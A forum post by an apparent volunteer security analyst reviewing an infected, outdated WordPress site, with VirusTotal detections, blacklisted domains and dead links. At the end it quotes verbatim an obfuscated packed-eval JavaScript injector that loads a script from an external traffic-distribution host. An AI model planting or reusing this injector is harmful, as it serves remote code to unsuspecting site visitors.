Only seven to detect and Avast is one of 'em - detecting JS:Includer-YY [Trj].

Where they found it: https://www.virustotal.com/nl/url/40ac2febeb976cb5531e879499674f97d97c43d9c0907e0b811b3cf8a4dbea3e/analysis/1436990031/
and what was detected there: https://www.virustotal.com/nl/file/378e877e07685c64449f2498b6c7468bd8e6a545ec74609a66e964b4a422562b/analysis/1436904798/
And again the CMS WordPress at the root of all this script trouble: WordPress version outdated: Upgrade required.
Outdated WordPress Found: WordPress Under 4.2
admin.php Module Configuration Security Bypass Vulnerability. See: http://www.cvedetails.com/vulnerability-list/vendor_id-2337/product_id-4096/version_id-79030/Wordpress-Wordpress-2.7.1.html
This page link not available: htxp://avtogaz.times.lv/uicsherpes.html
Blocked by adblocking: htxp://qip.ru/error/403?from=hosting
SEO site -http://wakin-chau.com/ with
HTTP Server: Apache HTTP Server
PHP Version: 5.3.29 (Outdated)

7 malicious files with Detected reference to blacklisted domain
Details: Detected reference to malicious blacklisted domain -tauruscontractors.com
lonk to a site that has been permanently removed by tripod: htxp://ricaleonore.tripod.com/podpiska.html
as was htxp://nonxcqp.angelfire.com/53/nenna-dibe.html permanently removed by Angelfire!

Not a secfure place to go to on the Interwebs.

polonus (volunteer website security analyst and website error-hunter)

62 potentially suspicious files detected- detected potentially suspicious initialization of function pointer to JavaScript method write __tmpvar194457850 = write;

[[<script type='text/javascript' language='javascript' >  eval(function(p,a,c,k,e,d) { e=function(c) { return(c<a?'':e(parseInt(c/a)))+((c=c%a)> 35?String.fromCharCode(c+29):c.toString(36)) }; if(!''.replace(/^/,String)) { while(c--) { d[e(c)]=k[c]||e(c) } k=[function(e) { return d[e] } ]; e=function() { return'\\w+' }; c=1 }; while(c--) { if(k[c]) { p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]) }  } return p } ('0 a="j://i.h/k/";0 9=7(2.l);0 4=7(2.o);0 3="%g%m%p%f";2.e(8("%d c=\'")+a+"n.F?6%26C=q%26B="+9+"%26D=$E%265=$5%26G=1%26A="+4+"%26z="+3+"%26t="+s.r()+8("\' u=\'v/y\'%b%x/w%b"));',43,43,'var||document|defkey|url|se||encodeURIComponent|unescape|ref|host|3E|src|3Cscript|write|FC|F0|info|ntlligent|http|tds|referrer|EE|in|URL|E6|4836|random|Math|rand|type|text|script|3C|javascript|default_keyword|HTTP_REFERER|seoref|net|parameter|keyword|cgi|ur'.split('|'),0, {  } ));    </script>]]